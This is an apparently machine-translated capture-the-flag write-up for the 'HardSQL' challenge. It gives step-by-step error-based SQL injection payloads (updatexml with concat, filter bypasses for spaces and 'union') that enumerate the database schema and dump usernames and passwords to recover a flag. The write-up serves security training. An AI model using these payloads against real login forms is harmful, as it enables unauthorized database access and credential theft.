[Geek Challenge 2019] HardSQL 1

Others 2021-01-27 23:19:12 views: null

[Geek Challenge 2019] HardSQL
1
[Target]
Sql injection
[Environment]
Buuctf
[Tools]
Browser
[Analysis]
1. Try to enter numbers or letters, all show the following results
Insert picture description here

2. Try the universal password
Insert picture description here

Display different words
3. Enter the query bar
Insert picture description here
Insert picture description here

Both methods show the same words
Insert picture description here

Double writing is also filtered out, and spaces, =, union are also filtered.
4. We try to report
error injection. There are two functions for error injection. Here we use updatexml(a,b,c). This function a, c must be String type, so you can make a, c not be String type to report an error
Payload:
username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#&password=1
Url:
username=1 %27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1
Insert picture description here

显示数据库
接下来查找表
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
Insert picture description here

接下来查字段
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database()))),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=1
Insert picture description here

得到id,username,password继续查询值
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=1
Insert picture description here

I found that the flag was not fully displayed.
After some queries, I know that the right() query is followed by
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25)))))from( H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)) ,0x7e),1))%23&password=1
Insert picture description here

Splicing to get
new knowledge of flag : available left(), right() when the check is not complete

Guess you like

Origin blog.csdn.net/bring_coco/article/details/108747855
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com